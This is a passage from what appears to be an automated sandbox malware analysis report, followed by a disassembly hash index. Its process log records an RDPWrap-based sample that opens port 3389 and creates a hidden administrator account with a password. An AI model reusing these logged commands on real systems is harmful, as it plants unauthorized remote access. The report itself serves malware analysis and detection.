                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:21:23:02
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\net1 user
                                                                              Imagebase:0xea0000
                                                                              File size:139'776 bytes
                                                                              MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:21:23:04
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                                                                              Imagebase:0xa40000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:21:23:04
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:21:23:04
                                                                              Start date:07/10/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                                                                              Imagebase:0x400000
                                                                              File size:1'785'344 bytes
                                                                              MD5 hash:C213162C86BB943BCDF91B3DF381D2F6
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000008.00000000.1434233686.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000008.00000000.1434308891.0000000000450000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 68%, ReversingLabs
                                                                              • Detection: 78%, Virustotal, Browse
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:21:23:07
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\netsh.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                              Imagebase:0x7ff607d80000
                                                                              File size:96'768 bytes
                                                                              MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:21:23:07
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:32'600 bytes
                                                                              MD5 hash:77FF15B9237D62A5CBC6C80E5B20A492
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:13
                                                                              Start time:21:23:07
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:169'984 bytes
                                                                              MD5 hash:64991B36F0BD38026F7589572C98E3D6
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:16
                                                                              Start time:21:23:07
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\drivers\tsusbhub.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:137'728 bytes
                                                                              MD5 hash:CC6D4A26254EB72C93AC848ECFCFB4AF
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:21
                                                                              Start time:21:23:37
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"cmd.exe" /c net user RDPUser_1e47a393 GEdtvn58rfdr /add
                                                                              Imagebase:0xa40000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:22
                                                                              Start time:21:23:37
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:23
                                                                              Start time:21:23:37
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:net user RDPUser_1e47a393 GEdtvn58rfdr /add
                                                                              Imagebase:0x210000
                                                                              File size:47'104 bytes
                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:24
                                                                              Start time:21:23:37
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\net1 user RDPUser_1e47a393 GEdtvn58rfdr /add
                                                                              Imagebase:0xea0000
                                                                              File size:139'776 bytes
                                                                              MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:25
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"cmd.exe" /c net localgroup
                                                                              Imagebase:0xa40000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:26
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:27
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:net localgroup
                                                                              Imagebase:0x210000
                                                                              File size:47'104 bytes
                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:28
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\net1 localgroup
                                                                              Imagebase:0xea0000
                                                                              File size:139'776 bytes
                                                                              MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:29
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                              Imagebase:0xa40000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:30
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:31
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\netsh.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                              Imagebase:0x15c0000
                                                                              File size:82'432 bytes
                                                                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:32
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"cmd.exe" /c net localgroup "Administrators" RDPUser_1e47a393 /add
                                                                              Imagebase:0xa40000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:33
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6ee680000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:34
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:net localgroup "Administrators" RDPUser_1e47a393 /add
                                                                              Imagebase:0x210000
                                                                              File size:47'104 bytes
                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:35
                                                                              Start time:21:23:38
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\net1 localgroup "Administrators" RDPUser_1e47a393 /add
                                                                              Imagebase:0xea0000
                                                                              File size:139'776 bytes
                                                                              MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:38
                                                                              Start time:21:23:43
                                                                              Start date:07/10/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 2756
                                                                              Imagebase:0x900000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Executed Functions

                                                                                Function 02AD3930 Relevance: 5.4, Strings: 4, Instructions: 357COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o$(o$(o$(o
                                                                                • API String ID: 0-3218871382
                                                                                • Opcode ID: 1ab2048f5c1328a45535cd25aa0e4160154edc4567655737aed7ab10895f3e3e
                                                                                • Instruction ID: 0e90b7c6ab10a1d1e0e6658b1b23c05e5c6eb1982bf64ff24fa8de98f91b04d1
                                                                                • Opcode Fuzzy Hash: 1ab2048f5c1328a45535cd25aa0e4160154edc4567655737aed7ab10895f3e3e
                                                                                • Instruction Fuzzy Hash: 35E14B74A002058FCB15EFA9D584A9EBBF2EF89310B1485A9E406EF365DF30AD49CF51
                                                                                Function 02AD30C8 Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o$(o$(o$(o
                                                                                • API String ID: 0-3218871382
                                                                                • Opcode ID: 552d891a400081f7f91d1709dbfe3e91d9a7e70e20e06623641c186cf25916d1
                                                                                • Instruction ID: 2aae4a19e1bfade281d95585918d0330b4a85c093187682901d0de2939480e1a
                                                                                • Opcode Fuzzy Hash: 552d891a400081f7f91d1709dbfe3e91d9a7e70e20e06623641c186cf25916d1
                                                                                • Instruction Fuzzy Hash: D8719135B006018FEB18EB7A881176EB7E6EFCA700F14856DD456AB394DE35EC05CBA1
                                                                                Function 02AD30B8 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o$(o$(o$(o
                                                                                • API String ID: 0-3218871382
                                                                                • Opcode ID: 31ae1260ab28e48c6be4ef6f54148dfc6ddaee558b3c852bc9c9d3123f45fa2b
                                                                                • Instruction ID: 321b586b8cb3c5d3e61871c0b0f185cd49b659db6d877ccb457d0eee49c62b1f
                                                                                • Opcode Fuzzy Hash: 31ae1260ab28e48c6be4ef6f54148dfc6ddaee558b3c852bc9c9d3123f45fa2b
                                                                                • Instruction Fuzzy Hash: D1216F31A002059FCF24DF69C845A9AFBF6FF8A300B0485ADE55AA7691DB74EC08CF51
                                                                                Function 02AD2849 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: pP
                                                                                • API String ID: 0-2161046187
                                                                                • Opcode ID: beefe3ceaa15f260033d11a169b78cd56c9993c7cb3fa221e7442e754353a1be
                                                                                • Instruction ID: f9923841e7591a5560c93ba22b01a58cb61cb49994f8e4bb48f3602da79f884d
                                                                                • Opcode Fuzzy Hash: beefe3ceaa15f260033d11a169b78cd56c9993c7cb3fa221e7442e754353a1be
                                                                                • Instruction Fuzzy Hash: B721A131E05218AFDF05DFA5D980ADEBBF6EF89310F148166E802B7242DB316D04CB54
                                                                                Function 02AD2858 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: pP
                                                                                • API String ID: 0-2161046187
                                                                                • Opcode ID: f52f70a0d6ff9c7168fe68138fd033712ad440606225e3c7371c57cdbc2f4e41
                                                                                • Instruction ID: b304400405e08417aab43ef23ff65619c9eb807a215e2d2b83aabc47df59f3a7
                                                                                • Opcode Fuzzy Hash: f52f70a0d6ff9c7168fe68138fd033712ad440606225e3c7371c57cdbc2f4e41
                                                                                • Instruction Fuzzy Hash: DB216031E05218AFDF05DFA5D980ADEBBF6EF89310F14816AE902B7246DA316D04CB95
                                                                                Function 02AD2FA7 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *
                                                                                • API String ID: 0-2709624293
                                                                                • Opcode ID: 3df1f9bacef2ed5de193ba6f410f295afa52c122b2df125e630bb46499b55746
                                                                                • Instruction ID: 6ab7d32ebee6ba0ec8724f6c2a52d0055a36bec32b8fb41537470e7e6d9f23e1
                                                                                • Opcode Fuzzy Hash: 3df1f9bacef2ed5de193ba6f410f295afa52c122b2df125e630bb46499b55746
                                                                                • Instruction Fuzzy Hash: AF215B70A002099FDB04FBA5D892BAE7BB2FBC9701F509529D901BB255EF706E04CB91
                                                                                Function 02AD2FB8 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *
                                                                                • API String ID: 0-2709624293
                                                                                • Opcode ID: 36edff77ecef75f4bc6d6b099c11929a32973b7b43ad98257abb09d16a0b9573
                                                                                • Instruction ID: 6b0f8312951e9e387dfa0bcb9cc0ae89756716325159fba54c480f4f67b791d8
                                                                                • Opcode Fuzzy Hash: 36edff77ecef75f4bc6d6b099c11929a32973b7b43ad98257abb09d16a0b9573
                                                                                • Instruction Fuzzy Hash: 81215C74A002099FDB04EBA5D892AAFBBB2FBC8701F109525D501BB295DF706E04CB91
                                                                                Function 02AD134B Relevance: .3, Instructions: 251COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7765dc087a89604d1c676eb6ae4a440594ff7d3638d8ecb89ef1dcac4e5a3245
                                                                                • Instruction ID: d6b8a37d7e6cf09427ce78febc463a4f5e9d689b9c12eb1dc54fa70c88cf6c0f
                                                                                • Opcode Fuzzy Hash: 7765dc087a89604d1c676eb6ae4a440594ff7d3638d8ecb89ef1dcac4e5a3245
                                                                                • Instruction Fuzzy Hash: 4AA15E75A00254CFDB09DF68D880A9DBBF5FF8A310F1941A5E806EB3A1DB31AD46CB50
                                                                                Function 02AD40C3 Relevance: .2, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3ea220fc416f66279134cb349e7f5be4e22fb74f442ec4ee875ba229abbd0ebc
                                                                                • Instruction ID: 7b47629b100e9ed9c28c81a337707a5b25e7f922073bf7c6c968c383541d70ae
                                                                                • Opcode Fuzzy Hash: 3ea220fc416f66279134cb349e7f5be4e22fb74f442ec4ee875ba229abbd0ebc
                                                                                • Instruction Fuzzy Hash: 21514830B003025BCB15FB69D892B6F77E6EBC96407509529E816EF348EF70ED058B91
                                                                                Function 02AD4E88 Relevance: .1, Instructions: 119COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 061312dde823f30b35617a8cc9cd1336ee6a7ec2af15c22b6d9d5ba4ee140e4e
                                                                                • Instruction ID: b655404b213db27456b716cfa7712133d4470a1fe43d69000f61b48a41cc9bbe
                                                                                • Opcode Fuzzy Hash: 061312dde823f30b35617a8cc9cd1336ee6a7ec2af15c22b6d9d5ba4ee140e4e
                                                                                • Instruction Fuzzy Hash: 3031C475A002058FCB04EBA9D885AAEB7B6FF8C310F158066E505E7355DF31DD46CBA0
                                                                                Function 02AD5038 Relevance: .1, Instructions: 115COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 31f6efd053a5a4caac65c96c208a0b031368dfca1cc7d6fc94d85ffd8c1a25f0
                                                                                • Instruction ID: f8830ad4753bf453c93f9c290f93974c6a4e891328b49676941f0100766dd9c1
                                                                                • Opcode Fuzzy Hash: 31f6efd053a5a4caac65c96c208a0b031368dfca1cc7d6fc94d85ffd8c1a25f0
                                                                                • Instruction Fuzzy Hash: 2D415C31E00205DFDB14AB65D898BAE7BB2AB88344F548429E406AB390DF359D49CF90
                                                                                Function 02AD49E8 Relevance: .1, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6dddafbb8fdaf90462a6e90171e7532852fcd8a54af4396b421a2eccb944a227
                                                                                • Instruction ID: f143963e2b1f366ea746e75f69fababe6db73f8b176ca1470297f0a43411fd9f
                                                                                • Opcode Fuzzy Hash: 6dddafbb8fdaf90462a6e90171e7532852fcd8a54af4396b421a2eccb944a227
                                                                                • Instruction Fuzzy Hash: 2031B075A007059FCB24EF69C58098EBBF1FF8C310B108669D45AAB365DB31ED04CBA0
                                                                                Function 02AD08E8 Relevance: .1, Instructions: 92COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 418d30605ad7884caacd95fb66994d94d56ea3bcd4dcc58330d72964211c261a
                                                                                • Instruction ID: ff1f34c4553242f3004eecb617213d7810c0bd257d6470c4b7382ff3eeef9d65
                                                                                • Opcode Fuzzy Hash: 418d30605ad7884caacd95fb66994d94d56ea3bcd4dcc58330d72964211c261a
                                                                                • Instruction Fuzzy Hash: FD41ECB4E0120ADFCB08EFA9E855AADB7B6FB8D300B104569D409E7354DB316E45CF90
                                                                                Function 02AD4BE1 Relevance: .1, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b4c54365ca61617ca8b5ce75784504c6197a457a7c31062c6685f31bab18b82a
                                                                                • Instruction ID: b936ce7bc50b158f1c0631e0e713157b43ef25bd94b30cfd51c9ef546bfba5b4
                                                                                • Opcode Fuzzy Hash: b4c54365ca61617ca8b5ce75784504c6197a457a7c31062c6685f31bab18b82a
                                                                                • Instruction Fuzzy Hash: F1318472E10709DFDB18CF94C8905DEBB71FF89314F14455AE912AB351DB71A846CB90
                                                                                Function 02AD49D8 Relevance: .1, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1919818828.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ad0000_hloRQZmlfg.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4ca717036de64f58b68bd6f38561044fd2bfd48250dddb06f35ae913bc445b1c
                                                                                • Instruction ID: 800ff45095a6761c5c78606e07b17c560d4d2d3db11aa9c8fe838c0ee221ca26
                                                                                • Opcode Fuzzy Hash: 4ca717036de64f58b68bd6f38561044fd2bfd48250dddb06f35ae913bc445b1c
                                                                                • Instruction Fuzzy Hash: 71219F35A003049FCB14EF79D58159EBBF1FF886107148AAAD44AAB215DB71AD08CB90
                                                                                Function 02AD0F90 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
